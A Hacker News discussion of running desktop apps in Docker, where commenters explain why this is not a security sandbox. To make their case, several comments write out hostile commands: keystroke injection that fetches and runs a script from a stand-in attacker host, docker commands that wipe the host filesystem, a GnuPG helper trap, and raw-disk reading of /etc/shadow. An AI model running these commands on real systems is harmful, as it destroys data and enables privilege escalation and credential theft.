Docker containers on the desktop (jessfraz.com)
267 points by julien421 on Feb 21, 2015 | 74 comments



This is not sandboxing. Quite the opposite, this gives the apps root access:

First of all, X11 is completely insecure; the "sandboxed" app has full access to every other X11 client. Thus, it's very easy to write a simple X app that looks for, say, a terminal window and injects key events into it (say, using the XTEST extension) to type whatever it wants. Here is another example that sniffs key events, including when you unlock the lock screen: https://github.com/magcius/keylog
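To make it concrete, something along these lines is all it would take (the window title, URL, and use of xdotool are purely illustrative; xdotool is just a convenient wrapper around XTEST):

    # any client on the X socket can focus another window and type into it
    xdotool search --name "Terminal" windowactivate --sync
    xdotool type 'curl http://attacker.example/pwn.sh | sh'
    xdotool key Return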

Secondly, if you have docker access you have root access. You can easily run something like:

docker run -v /:/tmp ubuntu rm -rf /tmp/*

Which will remove all the files on your system.


Just so everyone knows, this is Alex "I have a weird interest in application bundling systems" Larsson, who is doing some badass bleeding-edge work on full-on sandboxed desktop applications on Linux. :-)

http://blogs.gnome.org/alexl/2015/02/17/first-fully-sandboxe...

http://www.youtube.com/watch?v=t-2a_XYJPEY

Like Ron Burgundy, he's... "kind of a big deal".

(Suffer the compliments, Alex.)


Yes, I think it is important to make this point as Docker gains popularity: security is not part of its original design. The problem they apparently wanted to solve initially is the ability for a Linux binary to run, whatever its dependencies are, on any system.

It does try to keep containers separated, but it does not enforce that through a particularly strong mechanism.


AFAIK, breaking out of a Docker container isn't as trivial as the first part of your comment suggests. In particular, a Docker container can't run other Docker commands unless you grant it access with something like "docker run -v /var/run/docker.sock:/var/run/docker.sock".

Of course, there have been other vulnerabilities in the past allowing containers to get root. And the X11 weakness alone is enough to not treat this as a security layer.


I'm not entirely sure what Alex meant there, but I think his comment there was that the only way to be able to make use of this (at least until user namespace support lands in Docker) is for the user to have effective root on the system. So even if the sandboxing works, it's being done at a cost of requiring that, outside the sandbox, the users have an easy and passwordless way to gain root. This not only gives apps way more power than they had in the event of a sandbox escape mechanism (like the X11 socket), it also gives every unsandboxed app on the system way more power.

It's kind of like the general distaste for setuid binaries. If you have a correctly-written setuid binary, then you can use it to sandbox a process by, say, running it in a chroot. But if it's not correctly written, you have problems on your hands that far outweigh the problem you were originally trying to solve. So a random desktop app that ships with a setuid helper binary is going to be seen with suspicion. (Chrome is the only one I can think of that ships one, but they probably employ the people most qualified to write a bug-free setuid app, and they're getting rid of it in favor of user namespaces anyway.)

Of course, for the average developer desktop, processes probably have fifteen ways to gain passwordless root anyway. I certainly set sudo to nopasswd for convenience. :) So on a developer desktop, it's a nifty hack, although it doesn't gain you security against a malicious app/exploit. But as a general-purpose sandboxing approach, it's a bad tradeoff to make.
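(For reference, that convenience is a one-line sudoers entry; the username is made up:)

    # /etc/sudoers.d/nopasswd -- hypothetical convenience rule
    jess ALL=(ALL) NOPASSWD: ALL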


It's super easy to get out of this container. Just connect to the X socket, then look for a terminal window, then start injecting keyboard input into it.


If you break the app you have more or less the same access... if you break irssi, you're not root either.

This stuff is only sort-of reliable, when-containers-dont-have-root-bug-today, if you run it as a separate user from yourself in a different X server.

So basically not cool.

The way GNOME is doing ACTUAL sandboxing is much neater. Turns out it doesn't use Docker either. Go figure. /sarcasm


Gnome sandboxing uses exactly the same technologies behind the scenes as Docker uses: cgroups, namespaces, ... They add the additional requirement that they need Wayland to circumvent the security issues that X11 presents them. Other than that, you could do it just the same way.

So your "when-containers-dont-have-root-bug-today" applies to Gnome too...

Also: there is no such thing as 'actual' sandboxing. There are many forms of sandboxing; containers (not Docker-exclusive, as Gnome is using them in exactly the same way) are one form, but we also know virtual machines, the Java VM, JavaScript in a browser, ... the list goes on - all meaning the same thing: shield an application from everything else on the computer and try to prevent it from breaking out.


lol Alex, I didn't give people commands to remove their root filesystem ;) also thanks for the overlayfs patch, it's amazing


Not sure what you mean; any user with access to Docker can run processes as root, with any part of the host system mounted into the container. Now, that access was not added by you, but it's required to be able to run your images.

Once you have the images running the code in them could easily break out of the container via X11, and do things like sniff all keyboard events and inject events into any app.

Of course, the apps you put in the images probably are not doing that. But people need to be aware that this is not a sandbox they can run untrusted code in.


Yes, but you are kinda ruining the point; this is a fun hack with Docker, take it or leave it, that's all.


You wrote, "I know that the rest of my system is completely unaffected from anything the app does." This is unfortunately not true.

It's a fun hack, and I think if you said it was a fun hack instead of a security measure you'd have gotten a different reaction. (I agree it's a fun hack! It's just not a security measure.)


The commands I give are fine.

The one Alex gives in his comment mounts root into a container, something I am not suggesting at all, or anywhere close to doing. No one should ever mount root in a container; it's common sense.


I spent a few years working on general-purpose security sandboxing for Linux desktop apps (as a master's thesis), and gave up. The problem is that there are a bunch of common-sense things like not giving access to the root filesystem, and a million less common-sense things that also give you the ability to escape the sandbox. It really sucks.

There's X11, as Alex mentioned. If you grant permissions to an app to use the X11 socket, it has the ability to inject keystrokes to any other application in the same X session. If you have a terminal open where you run "sudo", then the app can gain root.

Your gparted example gives the app access to the root partition. This allows it the ability to modify anything on the drive without going through the filesystem's security layer. It can go change root's password, modify setuid binaries, etc. It can then flush the disk cache by reading a lot of something else, ensuring that the next time the kernel wants to check root's password, it won't be cached.
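To make that concrete, here's a sketch assuming an ext-family root filesystem on /dev/sda1. debugfs walks the filesystem structures directly, so mode bits and ownership never come into play:

    # hypothetical: with the raw device node, read any file regardless of permissions
    debugfs -R 'cat /etc/shadow' /dev/sda1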

Also, the state of the Linux kernel is such that if an app is running as UID 0 (even within a container), it probably has the ability to exploit some subtlety in the kernel interface to gain root. This is much reduced if you're using user namespaces (which, AIUI, Docker is not yet using), but it's still a risk. It's a huge risk without user namespaces.

If you trust the app, then you don't need an app (security) sandbox, which I think is what Alex is saying: "This is not sandboxing." If you don't trust the app, then Docker will not effectively restrict what the app can do to your system.


What did Alex say that hinges on you consciously mounting root into a container? Either you've given the unprivileged host user access to the Docker socket (implicitly giving permission to run any container, which enables a hostile actor to mount root inside a container) or you're running as the host's root user. This is, by my lights, an anti-sandbox--there's separation of file system (though not really any security not offered by the file system) at the cost of major privilege escalation and the kind of false empowerment that leads people to do dumb, risky things. And it really bears very little resemblance to the Apple sandboxing system to which you are attempting to equate it.

(EDIT: And the Dockerfiles are running the applications inside as root. As mentioned elsewhere, Docker doesn't currently use user namespaces, so an RCE in Google Chrome has just been upgraded to a root RCE because of this. Feeling safe?)

I generally don't subscribe to a particularly absolutist view of the world, but this is a real bad thing and I pretty strongly feel that somebody who works on Docker not explaining the ramifications of this misuse of the technology is pretty irresponsible.


Yeah, that's also an interesting point: in order to use Docker, the host user must have (effective) root capabilities on the host.

That ensures that any container-to-outside-user exploit can also turn into a container-to-root exploit.

If you have an X11 socket, then you can inject keystrokes to launch a new docker process that runs `rm -rf /`.

If you have write access to ~/.gnupg, as in the Mutt example, then you can edit ~/.gnupg/gpg.conf to set `exec-path ~/.gnupg/pwned`, so that keyserver helpers are looked up in that path, and then create an executable in that directory that runs docker to run `rm -rf /`. So the next time someone runs `gpg --search-keys` on the host....
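Spelled out, the trap is only a few lines (everything here is illustrative; the helper name follows the GnuPG 1.4-era gpgkeys_* convention):

    echo 'exec-path ~/.gnupg/pwned' >> ~/.gnupg/gpg.conf
    mkdir -p ~/.gnupg/pwned
    cat > ~/.gnupg/pwned/gpgkeys_hkp <<'EOF'
    #!/bin/sh
    # runs with the host user's docker access, i.e. effective root
    docker run -v /:/host ubuntu rm -rf /host
    EOF
    chmod +x ~/.gnupg/pwned/gpgkeys_hkp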

Sandboxing applications is hard. There's a reason the only good UNIX sandboxes in general use are on iOS and Android, because they had no backwards-compatibility constraints, and even those sandboxes aren't perfect.


You didn't give the root command. But the app can easily send keyboard input events to your terminal window, injecting that command.


That's not a Docker issue, that's an X11 issue. Unless you're using Wayland, you don't have much choice here.


You have lots of choices. Try making another X server with Xephyr and connecting to that, for example.
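Something like this (display number and geometry arbitrary):

    # run a nested X server and point the container's clients at it
    Xephyr :1 -screen 1280x800 &
    DISPLAY=:1 xterm    # clients on :1 can't touch windows on :0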


What is he ruining by pointing out security vulnerabilities in this "fun hack"? (Something you're claiming in that blog post is beneficial, so I'm not exactly buying your retroactive characterization here.)

This sort of thing is irresponsible without the proper explanation of the dangers involved.


Yes, see Qubes to understand the level of effort required for robust isolation between desktop AppVMs.


Totally. It's not a simple task, and what this post describes creates a threat model that I would generously term "dire."


"Take it or leave it" is cool if it is a game or "I like the font to be blue" or "you are using Haskell, why don't you use Javascript instead". They should totally leave it and move on.

But now, he mentioned a valid security issue and instead of being glad and acknowledging it, you are dismissing it. With security issues that is not cool.

It probably doesn't help that if you put "Docker" or "microservices" in the headline, it will get upvoted to the top.


This is neat.

But.

Docker isn't sandboxing in a security sense. It's sandboxing in a deployment sense: given a friendly app and a friendly host, the app can get an environment it wants without bothering the host to adapt too much. Given two friendly apps and a friendly host, the two apps can see different environments.

Given an unfriendly app, Docker is no different from running the unfriendly app directly.

I think the really cool thing about this is that, given how straightforward these examples look, you can use this as a deployment platform: go use whatever weird Linux distro you want, and still be able to run software that's only supported on an Ubuntu LTS.

But I think the comparison to Apple's sandbox is misleading, and also vaguely unfair to the good work that Apple has done in building a security sandbox.


> Given an unfriendly app, Docker is no different from running the unfriendly app directly.

I understand the risk of a kernel zero-day. But for desktop apps, when used in conjunction with SELinux, can't Docker be considered to provide a level of sandboxing? In fact, I have not heard of any container breakouts. AFAIK, the only incident that came close (but only worked on unpatched Docker) was https://news.ycombinator.com/item?id=7909622 and this was before their 1.0 release.

I'd like to hear your thoughts since a project I'm working on assumes that in a year's time containers will provide a sandboxing alternative for server-side use. I can see some companies doing this already.

EDIT: X11 issues aside, as mentioned above by alexlarsson


Without user namespaces (CLONE_NEWUSER), which Docker currently doesn't use, uid 0 inside a container is the same thing as uid 0 outside it. If you let Docker run apps as root, which seems to be not uncommon, then it is, in a strong sense, the same as the root user outside the container. That's why Jessie's gparted process can partition her disk: as long as it can get at the device node, it has full permissions on it.

Apart from things that you've explicitly given it access to (like device nodes), the risk of zero-days is higher because these sorts of things aren't quite zero-days: it's not fundamentally a violation of the kernel's security model for uid 0 to be able to do root-y things. You might want it to be unable to, and you might mostly succeed by not exposing certain device nodes, using a process namespace (CLONE_NEWPID) so it can't attach itself as a debugger to other things on the system, etc. etc. But there's no intent in the kernel to make this safe. It's mostly an emergent feature of other things, and emergent features make bad security features.

What you can do is run as not root, which still makes you the same as some other UID on the system, but guarantees that you're not risking increasing privileges. User namespaces give you a few additional features here: first, even the process of entering a chroot / container doesn't require root or a setuid binary, which is neat. Second, even if you're root inside the container, you're not root on the host system in the same sense, and it's just kernel code that's checking for uid == 0 (which should almost all be gone, since they changed the uid_t type in userns-enabled kernels) that thinks you're root.
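You can see that second point for yourself with a reasonably recent util-linux, assuming a userns-enabled kernel:

    # enter a new user namespace, mapping your uid to 0 inside it
    unshare --user --map-root-user sh -c 'id; cat /proc/self/uid_map'
    # id reports uid=0(root), but uid_map shows it's really your host uid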

SELinux might be able to help you here, and I'm not really familiar with what the standard recommendations for SELinux and Docker are. I'd basically consider applying it as if the container didn't exist: if you're comfortable with something running as root with SELinux confinement, then it's definitely fine to run as root inside Docker with SELinux confinement. If not, I wouldn't risk it.

For server containment, you should take a look at https://sandstorm.io/ , which uses user namespaces and runs apps as uid 1000 inside the namespace. This means that it's running with no more privilege than the host user in the worst case.


The reason you don't hear about Docker breakouts is because Docker never claimed to be a secure sandbox in the first place, so a breakout is a non-event.

Note that local privilege escalation exploits in Linux are found regularly, like on a monthly basis, and every one is likely a Docker breakout.

geofft mentioned Sandstorm -- my project -- which actually does claim to be a sandbox, and isn't affected by most of these kernel exploits. Here's a blog post discussing the differences:

https://blog.sandstorm.io/news/2014-08-13-sandbox-security.h...


I hate that the isolation of containers gets oversold as a security feature because there is real value in what you might call "configuration isolation".

Often, I am reluctant to run something not because of a trust issue but a complexity issue. I run a heavily customized environment. I will often be burned by an application---for example---creating a symlink that under "normal" circumstances is perfectly copacetic but all but destroys some carefully crafted aspect of my environment. Similarly, isolation that is not up to the task of stopping evil is often more than adequate for stopping stupid (e.g., the recent "Steam deletes your home directory" issue). How often have you updated your system only to have one or two apps misbehave? With what jessfraz presents here, yum and apt become tools you can apply selectively. There are real non-security benefits to be had.

I realize that part of the oversell is the nature of hype but I can't help but feel that a---perhaps---equal part is that talking about these kinds of benefits is a more subtle and nuanced conversation.


ha! Though what's more common? Evil or stupid?

I'd say evil, people don't automate stupid.


Ignoring X11 security, I have also used this technique successfully in certain situations. See: https://github.com/samtstern/android-vagrant

That allows anyone on Linux to download, install, and run Android Studio with a single 'docker run ...' command, and for Mac/Windows users to do the same within a VM using just 'vagrant up'. It's not something I'd use to run Android Studio myself, but it's great to get someone quickly up and running without messing with all of the environment headaches (Android SDK location, Java version, etc).


Yes, it sounds great for teaching an introductory class, trying to keep things as lightweight as possible if students want to work on it on their own machines.


The need for stuff like Docker is an admission that OS privilege isolation and resource management is woefully inadequate.



What I find odd is that he is ranting as if it is a code problem when it is a package manager problem.

Unless I am badly off the mark, ld will use the soname to tell lib v1.0 from v1.1 or v5.97. But the problem is with package managers flatly refusing to have anything to do with installing multiple lib versions side by side.

That is, if they have the same package name. The end result is that one distro uses glib3.xyz to designate glib 3.x, while another uses glib-3.xyz, and yet another uses glib.3.xyz.

They all hold the same files, but for the package managers they are different packages. And will resolve dependencies based on that.

Applying containers and/or sandboxes to this is a Wile E. Coyote solution...


It is not just this. It is also that RHEL 6 will have libfoo4, while Ubuntu 14.04 will have libfoo6, and then Debian Wheezy will have libfoo5. Even if the way the packages' dependencies were expressed (libfoo-1-3 vs. libfoo3) were the same, the constant ABI breakage would be harmful.


But that problem is largely because of what I started out with: their package managers can't handle having multiple versions of libfoo installed under the same package name. Even though ld and friends can, via the soname.

So they "avoid" it by insisting on using a specific version for the duration of the distro version.


25:50 as well.


Actually, everything that enables Docker is provided by the OS. AppArmor, SELinux, cgroups are all isolation capabilities provided by Linux. What you're seeing is libraries building on it finally becoming high-level enough that regular people are able to take advantage of them.


Right, but the fact that such large ecosystems have originated out of these high-level abstractions (on top of Docker you have all the container clustering and orchestration platforms, homegrown PaaS and whatnot) shows that there is indeed something lacking.

What the OP probably meant is that none of these solutions are actually a seamless part of the workflow when using the OS.


Isolation is possible in a multi-user system with text-mode apps (ncurses and such); it's just that Xorg presents a privilege hole that can't be easily plugged. One way to do it may be to run a separate instance of X inside the container and access it via VNC from the host system.


It looks like the situation is somewhat better in Wayland?

http://mupuf.org/blog/2014/02/19/wayland-compositors-why-and...


Absolutely. This was one of the main reasons that the Wayland protocol was written.


Wayland is another, probably simpler, alternative.

One thing, though: Docker itself presents a privilege hole that can't be easily plugged, too. That's a large part of why I've expressed alarm upthread.


In a recent article on sandboxing in Linux [1] it was mentioned that "X11 is impossible to secure". I'm not sure how deep that goes, or whether it's relevant to what's been done here.

Could someone more knowledgeable comment?

[1]: http://blogs.gnome.org/alexl/2015/02/17/first-fully-sandboxe...


Basically, all the clients that connect to an X server have full trust in each other. You can sniff any event sent to any client, send fake events (that are not detectable as fake) to any client, and read the contents of any window. This essentially means any client can do whatever the user can do.

People have tried to make it more secure in various ways (trusted X, SELinux X), but it is impossible: so much of the way X does things like DnD, cut-and-paste, and window management depends on this mutual trust that it's just not possible to separate clients from each other without the entire thing breaking.
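The sniffing half doesn't even require cleverness; stock tools will do it (the device id is a placeholder, find yours with xinput list):

    xinput list              # find the keyboard's device id
    xinput test <device-id>  # prints every key press/release, no privileges needed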


Wayland will eventually fix/mitigate this, correct?


Wayland sessions are separated from each other.


It's impossible to secure direct, unfiltered access to the X11 protocol: the protocol, by its nature, involves no access controls on who owns what widgets, who gets to inject events, and so forth.

There is a "SECURITY" extension to X11, which is what's (often) used when you run ssh -X instead of ssh -Y. It doesn't quite support everything; I fairly often saw things like emacs crash when run with ssh -X. Furthermore, it provides only a single isolation boundary: every app running with the security extension has access to every other. So, for this sort of use case, the best you could have is that all your Dockerized apps can mess with each other, but not with processes on the host, which isn't quite what you'd hope.

There's "security-enhanced X", but basically imagine SELinux applied to each widget on your screen (which is what it is). If you think making SELinux usable and secure is hard, you won't look forward to this.

I sketched a design a while ago for doing protocol-level filtering of X where each app effectively lived in its own namespace. Widgets, resources, etc. created by one app are inaccessible to another, because they're not nameable. A middle layer translates each name into a name in a common global namespace, so the X server is unmodified. I think this is doable but a lot of work, especially given how many extensions are in the X protocol. It also doesn't really help you if, say, your OpenGL stack isn't good at isolating one app from another.

I think the other promising approach is to use a remote-desktop like solution (like Xpra, or x11vnc, or something) which spawns a separate X11 server, and screen-scrapes it and passes it to the host. You lose a few things like OpenGL, and the overhead might get prohibitive if you run one X server per app, but the isolation is pretty solid.
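The Xpra variant is roughly this much work (display number arbitrary):

    # inside: start a private X server with the app attached to it
    xpra start :100 --start-child=xterm
    # on the host: screen-scrape that display into your real session
    xpra attach :100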


Basically, you shouldn't rely on techniques like this to protect you against a malicious app. You can rely on them as one more step to protect you against stupid mistakes, to help you keep configurations etc. isolated, and to make upgrades easier.


I would say it doesn't even do that, given that you're having to give root-level access to an unprivileged user to do it.


This conflates two different things. You effectively get root-level access if you are allowed to execute Docker, that is true. But things running in Docker do not have to be given root-level access - you can just as well run things inside Docker as a regular user.

I'm not an unprivileged user on any machine I operate in any practical sense, nor are most Linux desktop users, so to me that point is largely moot. That is, even if I'm technically not root most of the time, if I run a malicious app it can relatively easily set up plenty of traps in my home directory to get me to run whatever code it wants with elevated privileges sooner or later anyway. So from the outside, having the ability to run Docker does not expose me much more - get my user account, and chances are you get root if you're not completely inept.

That doesn't mean it wouldn't be good to get a better/more fine grained privilege model for Docker for other use cases.

Inside Docker containers, nothing stops us from having everything run as a regular user, though admittedly many Docker containers err and run everything as root, often for no good reason (especially given that Docker's port forwarding/mapping means a lot of daemons that otherwise would at least want to start as root - even if it could be avoided - have even less reason to be started as root).
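Concretely, that's nothing more than a -u flag (uid and image arbitrary):

    # run the containerized process as an unprivileged uid instead of root
    docker run --rm -u 1000:1000 ubuntu id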

But even running as root, assuming an app that isn't malicious, and barring me stupidly mounting "/" as a volume in the container, it won't do things like accidentally deleting [major system directory] (as some app did a while back).

It also won't barf files all over my filesystem for no good reason. And I won't accidentally expose ports I don't want to expose. Amongst many other things.


> I'm not an unprivileged user on any machine I operate in any practical sense, nor are most Linux desktop users, so to me that point is largely moot. That is, even if I'm technically not root most of the time, if I run a malicious app it can relatively easily set up plenty of traps in my home directory to get me to run whatever code it wants with elevated privileges sooner or later anyway.

I don't know how to say this in a way that isn't snarky, but: be better about your operational security, then. I run all of my Unix machines with the exception of the Mac I don't care about with a user not in /etc/sudoers. That you're tripping yourself up is your own fault.

That doesn't excuse this sort of recklessness being advocated by a Docker employee.


Aside from the security issues with X11, I've never had a good experience from a usability perspective with X11 on OS X. Basic actions like resizing windows need to offer a native-quality experience before mass adoption can happen. Disclaimer: I'm not sure if this was a limitation of the apps or of X11.


This reminds me of the subuser project (http://subuser.org/) which is basically about using Docker to achieve sandboxing - the project is effectively aiming to build a linux package manager out of Docker.

Several commenters have pointed out the very real security issues with exposing the X11 socket. This is true, but you could use ssh forwarding or VNC (at a considerable performance penalty). I believe the other security issues (mainly related to containers running as UID 0, and which user processes run as) will be solved shortly. Running applications in Docker is never going to be as secure as running an app in a full VM, but it can definitely be better than trusting random code on the internet (the recent Steam client issue springs to mind).


You can also use just LXC to do the same: https://www.stgraber.org/2014/02/09/lxc-1-0-gui-in-container...


Are Docker containers actually sensibly secure as sandboxes? I thought there were still some gaps that needed to be closed in the underlying tech for it to be as safe as virtualization?


It's a lot better than no attempt at sandboxing, but ultimately you're still at the mercy of a late addition to the Linux kernel (cgroups), which isn't exactly the safest codebase to make major changes like this in.

Denial of Service attacks are probably more straightforward than in a virtualized environment; I'm sure you could find a way to starve the kernel for something.

That said, there's currently no trivial "now I'm root on the host box" option or anything.


I've said this elsewhere in the thread, but this is not better than "no sandboxing". "No sandboxing" doesn't run applications as root (UID 0) on the host.

Please stop repeating this. Docker is not a security tool, apparently by their own decision. It hurts people when the opposite becomes part of the common knowledge.


"Docker does not support user namespaces"[1] so root inside a container == root on the host. Getting security right with user namespaces is hard though[2].

And as another commenter pointed out, you can't give a user permission to actually start a docker container without also giving them root access to the host.
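That is, this (username hypothetical) is a root grant:

    # adding a user to the docker group is effectively granting root
    sudo usermod -aG docker alice
    # alice can now get a root shell on the host filesystem:
    docker run -it -v /:/host ubuntu chroot /host /bin/bash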

[1] https://docs.docker.com/articles/security/ [2] http://lwn.net/Articles/626665/


For my part what I care most about with Docker is not the ability to run something I don't "trust". That is, I would not trust or expect it to be safe enough to run code I expect to be malicious.

For me it's about creating a setup that is far easier to reproduce in the face of e.g. system upgrades or setting up a new machine, as well as protection against stupid mistakes, and about containing state.


These are great - I'm already using docker containers for nearly everything I do for development, and now I'm inspired to continue the trend into all the other applications on my system. They're more portable (I keep my zsh aliases in github) and it'll keep my Arch/i3 install cleaner too. Thanks for the tips. I think my next step will be to start assigning the apps to their own workspaces in i3. Great post.


https://www.usenix.org/legacy/events/atc10/tech/full_papers/...

Abstract

Desktop computers are often compromised by the interaction of untrusted data and buggy software. To address this problem, we present Apiary, a system that transparently contains application faults while retaining the usage metaphors of a traditional desktop environment. Apiary accomplishes this with three key mechanisms. It isolates applications in containers that integrate in a controlled manner at the display and file system. It introduces ephemeral containers that are quickly instantiated for single application execution, to prevent any exploit that occurs from persisting and to protect user privacy. It introduces the Virtual Layered File System to make instantiating containers fast and space efficient, and to make managing many containers no more complex than a single traditional desktop. We have implemented Apiary on Linux without any application or operating system kernel changes. Our results with real applications, known exploits, and a 24-person user study show that Apiary has modest performance overhead, is effective in limiting the damage from real vulnerabilities, and is as easy for users to use as a traditional desktop.



What I was missing is a Docker container that hosts the X server and exposes the X socket for the other GUI containers. This would be great for non-GUI Docker management platforms such as CoreOS.


Would this be a good way to deploy an opencv based solution?

I spent an entire day getting opencv with Python bindings installed on my Mac and I'm dreading deploying it anywhere else.


Not sure if there are graphical interfaces pieces to your application that need to be considered, but in general Docker is very helpful for problems like that ("I set this up once and god help me if I can ever set up the dependencies and configure my system the same way again").


What is missing (technically) in order to be able to distribute 1-click GUI apps for Windows, Linux and OS X as docker containers?


Docker doesn't directly do cross-platform: the Docker API is the Linux kernel userspace API. If you want to run Dockerized apps on OS X or Windows, then you're using boot2docker, which is a distribution of Linux running inside a VM.

So most of the question is whether you're happy with this as a distribution mechanism. The best you'll be able to do is something like VMware's Unity mode, which isn't bad, but isn't good either. Alternatively, you could run an X11 server on Windows (via Cygwin) and OS X (Xdarwin), but that's also going to look very non-native.

If you're not, then there's an open technical problem of how to make it look reasonable. I'd consider whether browser-based desktop apps are an option: you can require a recent Chrome or Firefox, come up with three common launchers for each platform (think PhoneGap), and then run the Linux backend inside a VM on Windows and OS X. But that seriously restricts the set of apps that are in scope, and at that point, you might also try just building a cross-platform backend (using Go, maybe?).


Has anyone built a GUI wrapper for Docker that would allow someone to one-click an app like this on a Win/Mac desktop?


There is Kitematic for Macs, but it requires VirtualBox: https://kitematic.com


This is a great idea. I think the criticisms should be more ideas for improvement because this is definitely the future.


I sure hope that it isn't, we need simple things, not layers of complexity.



what the fuck



